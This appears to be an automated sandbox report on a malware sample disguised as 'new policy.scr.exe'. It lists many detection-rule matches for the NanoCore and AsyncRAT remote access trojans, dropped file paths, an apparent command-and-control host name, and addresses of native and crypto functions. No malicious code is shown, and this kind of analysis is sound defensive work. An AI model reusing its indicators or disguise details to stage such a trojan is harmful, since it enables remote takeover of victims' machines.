Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000002.00000000.1859765201.0000000000282000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000009.00000002.2363417540.0000000003E7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Networks!.exe PID: 3720, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Contains functionality to call native functions

Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5FBD0 NtResumeThread,	0_2_05D5FBD0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5E6E0 NtProtectVirtualMemory,	0_2_05D5E6E0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5FBC8 NtResumeThread,	0_2_05D5FBC8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5E6DB NtProtectVirtualMemory,	0_2_05D5E6DB
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9FBD0 NtResumeThread,	6_2_05D9FBD0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9E6E0 NtProtectVirtualMemory,	6_2_05D9E6E0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9FBC8 NtResumeThread,	6_2_05D9FBC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9E6DB NtProtectVirtualMemory,	6_2_05D9E6DB
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594FBD0 NtResumeThread,	7_2_0594FBD0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594E6E0 NtProtectVirtualMemory,	7_2_0594E6E0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594FBC8 NtResumeThread,	7_2_0594FBC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594E6D9 NtProtectVirtualMemory,	7_2_0594E6D9

Detected potential crypto function

Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_013D6BC8	0_2_013D6BC8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_013DB178	0_2_013DB178
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_013D6BB8	0_2_013D6BB8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_013D7638	0_2_013D7638
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_053505F8	0_2_053505F8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_053505E8	0_2_053505E8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E7C48	0_2_059E7C48
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E0040	0_2_059E0040
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E6E88	0_2_059E6E88
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E0006	0_2_059E0006
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E7C38	0_2_059E7C38
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E8048	0_2_059E8048
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E6710	0_2_059E6710
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E6720	0_2_059E6720
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E1290	0_2_059E1290
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E12A0	0_2_059E12A0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E8200	0_2_059E8200
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05BF2CF1	0_2_05BF2CF1
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05BF3087	0_2_05BF3087
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05BF4368	0_2_05BF4368
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5B928	0_2_05D5B928
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D598B0	0_2_05D598B0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5E458	0_2_05D5E458
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D52EB8	0_2_05D52EB8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5B918	0_2_05D5B918
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D598A0	0_2_05D598A0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5E44B	0_2_05D5E44B
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D59C03	0_2_05D59C03
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5AE10	0_2_05D5AE10
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5AE00	0_2_05D5AE00
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05E7EFA0	0_2_05E7EFA0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05E7FB00	0_2_05E7FB00
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05E7D088	0_2_05E7D088
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05E60040	0_2_05E60040
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05E60006	0_2_05E60006
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Code function: 2_2_00007FFD9BAC6D69	2_2_00007FFD9BAC6D69
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Code function: 2_2_00007FFD9BAC5FB9	2_2_00007FFD9BAC5FB9
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588E5D8	3_2_0588E5D8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_05883471	3_2_05883471
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588DE00	3_2_0588DE00
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588F1F0	3_2_0588F1F0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588B098	3_2_0588B098
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588B0A8	3_2_0588B0A8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588FAD0	3_2_0588FAD0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_077554B8	3_2_077554B8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0775E3F8	3_2_0775E3F8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0775DB28	3_2_0775DB28
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_07755A00	3_2_07755A00
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_07759850	3_2_07759850
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0775D7E0	3_2_0775D7E0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0775A526	3_2_0775A526
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0775A468	3_2_0775A468
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_077554A8	3_2_077554A8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_077559F1	3_2_077559F1
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0775E8F8	3_2_0775E8F8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B26BC8	6_2_02B26BC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B2B178	6_2_02B2B178
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B26BBF	6_2_02B26BBF
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B2765B	6_2_02B2765B
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B59EF0	6_2_02B59EF0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B5E707	6_2_02B5E707
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B56A10	6_2_02B56A10
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B5E9E5	6_2_02B5E9E5
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B59EE1	6_2_02B59EE1
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B5ECB0	6_2_02B5ECB0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B5ECAE	6_2_02B5ECAE
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A20040	6_2_05A20040
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A27C48	6_2_05A27C48
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A26E88	6_2_05A26E88
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A2003B	6_2_05A2003B
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A27C38	6_2_05A27C38
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A26720	6_2_05A26720
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A26710	6_2_05A26710
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A212A0	6_2_05A212A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A21290	6_2_05A21290
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A28200	6_2_05A28200
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05C32D50	6_2_05C32D50
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05C33087	6_2_05C33087
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05C34368	6_2_05C34368
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9B928	6_2_05D9B928
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D998B0	6_2_05D998B0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9E458	6_2_05D9E458
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D92EB8	6_2_05D92EB8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9B918	6_2_05D9B918
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D998A0	6_2_05D998A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9E44B	6_2_05D9E44B
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D99C03	6_2_05D99C03
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9AE10	6_2_05D9AE10
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9AE00	6_2_05D9AE00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05EBEFA0	6_2_05EBEFA0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05EBFB00	6_2_05EBFB00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05EBD088	6_2_05EBD088
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05EA0040	6_2_05EA0040
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05EA0021	6_2_05EA0021
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00DF6BC8	7_2_00DF6BC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00DFB178	7_2_00DFB178
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00DF6BB8	7_2_00DF6BB8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00DF735D	7_2_00DF735D
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F19EF0	7_2_00F19EF0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F1E707	7_2_00F1E707
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F1E9E5	7_2_00F1E9E5
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F16A10	7_2_00F16A10
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F1ECB0	7_2_00F1ECB0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F1ECAF	7_2_00F1ECAF
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F19EE1	7_2_00F19EE1
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D7C48	7_2_055D7C48
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D0040	7_2_055D0040
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D6E88	7_2_055D6E88
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D0006	7_2_055D0006
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D7C38	7_2_055D7C38
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D6710	7_2_055D6710
